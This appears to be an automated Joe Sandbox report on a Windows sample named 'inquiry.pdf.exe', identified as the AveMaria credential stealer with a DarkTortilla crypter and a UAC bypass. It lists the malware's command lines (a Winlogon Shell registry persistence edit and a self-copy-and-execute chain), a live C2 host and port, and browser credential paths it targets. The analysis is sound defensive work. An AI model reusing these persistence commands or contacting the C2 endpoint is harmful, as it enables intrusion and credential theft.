Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inquiry.pdf.exe

Overview

General Information

Sample Name:inquiry.pdf.exe
Analysis ID:715157
MD5:6236e43da1b2c6279760e6b2b7e2d40f
SHA1:a24221417ff9c0d169bf17b7f242824fe61d3b72
SHA256:b4056e17199edd889d2b77c02865136c47ab29566717c2f86ae8911c02e2994a
Tags:exe
Infos:

Detection

AveMaria, DarkTortilla, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected DarkTortilla Crypter
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Injects a PE file into a foreign processes
Uses ping.exe to sleep
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • inquiry.pdf.exe (PID: 5896 cmdline: C:\Users\user\Desktop\inquiry.pdf.exe MD5: 6236E43DA1B2C6279760E6B2B7E2D40F)
    • cmd.exe (PID: 2148 cmdline: cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 612 cmdline: ping 127.0.0.1 -n 7 MD5: 70C24A306F768936563ABDADB9CA9108)
      • reg.exe (PID: 4684 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe," MD5: CEE2A7E57DF2A159A065A34913A055C2)
    • cmd.exe (PID: 3272 cmdline: cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 636 cmdline: ping 127.0.0.1 -n 12 MD5: 70C24A306F768936563ABDADB9CA9108)
      • PING.EXE (PID: 5244 cmdline: ping 127.0.0.1 -n 12 MD5: 70C24A306F768936563ABDADB9CA9108)
      • glonkjhg.exe (PID: 4760 cmdline: C:\Users\user\AppData\Roaming\glonkjhg.exe MD5: 6236E43DA1B2C6279760E6B2B7E2D40F)
        • AddInProcess32.exe (PID: 2400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
        • AddInProcess32.exe (PID: 1916 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
        • jhFFFffkl.exe (PID: 4896 cmdline: "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
          • jhFFFffkl.exe (PID: 6060 cmdline: "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
        • jhFFFffkl.exe (PID: 4184 cmdline: "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
          • jhFFFffkl.exe (PID: 3932 cmdline: "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe" MD5: 0E362E7005823D0BEC3719B902ED6D62)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "hannoyputa.giize.com", "port": 3027}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0xdf0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0xdf0:$c1: Elevation:Administrator!new:
00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
    • 0x1f48:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
    • 0x1f48:$c1: Elevation:Administrator!new:
    00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
      00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 56 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.inquiry.pdf.exe.3b9a2b2.5.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
          0.2.inquiry.pdf.exe.3c6b362.7.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            20.3.AddInProcess32.exe.ea6d50.0.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0x5f8:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            20.3.AddInProcess32.exe.ea6d50.0.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0x5f8:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            • 0x5f8:$c1: Elevation:Administrator!new:
            20.3.AddInProcess32.exe.ea6d50.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x3b40:$a1: \Opera Software\Opera Stable\Login Data
            • 0x3e68:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x36f0:$a3: \Google\Chrome\User Data\Default\Login Data
            Click to see the 222 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: inquiry.pdf.exeReversingLabs: Detection: 39%
            Antivirus / Scanner detection for submitted sample
            Source: inquiry.pdf.exeAvira: detected
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Multi AV Scanner detection for domain / URL
            Source: hannoyputa.giize.comVirustotal: Detection: 5%Perma Link
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeAvira: detection malicious, Label: HEUR/AGEN.1251650
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeAvira: detection malicious, Label: TR/Agent.able
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeMetadefender: Detection: 13%Perma Link
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeReversingLabs: Detection: 39%
            Machine Learning detection for sample
            Source: inquiry.pdf.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeJoe Sandbox ML: detected
            Source: 19.0.AddInProcess32.exe.900000.0.unpackAvira: Label: TR/Redcap.ghjpt
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "hannoyputa.giize.com", "port": 3027}

            Exploits

            barindex
            Yara detected UACMe UAC Bypass tool
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1916, type: MEMORYSTR
            Source: inquiry.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49705 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: inquiry.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000014.00000002.515139413.0000000003018000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\inquiry.pdf.exeCode function: 4x nop then mov ecx, 6B3AC8CCh0_2_00E36B00
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 4x nop then mov ecx, 6B4AC8CCh18_2_01246B00
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeCode function: 4x nop then add dword ptr [ebp-20h], 01h18_2_0124F618

            Networking

            barindex
            Uses ping.exe to check the status of other devices and networks
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: hannoyputa.giize.com
            Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-NYC-11US LEASEWEB-USA-NYC-11US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 23.105.131.206 23.105.131.206
            Source: global trafficTCP traffic: 192.168.2.3:49706 -> 23.105.131.206:3027
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: inquiry.pdf.exe, 00000000.00000003.256866785.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: glonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1Imt
            Source: glonkjhg.exe, 00000012.00000003.394602968.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.392396802.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/gImt
            Source: glonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobjImt
            Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comIta
            Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comTC
            Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comers
            Source: inquiry.pdf.exe, 00000000.00000003.262056108.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262023926.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comgo
            Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comintTV
            Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comize
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: inquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.commbe
            Source: inquiry.pdf.exe, 00000000.00000003.261955611.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261989796.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.(
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
            Source: inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/
            Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmln-uO
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
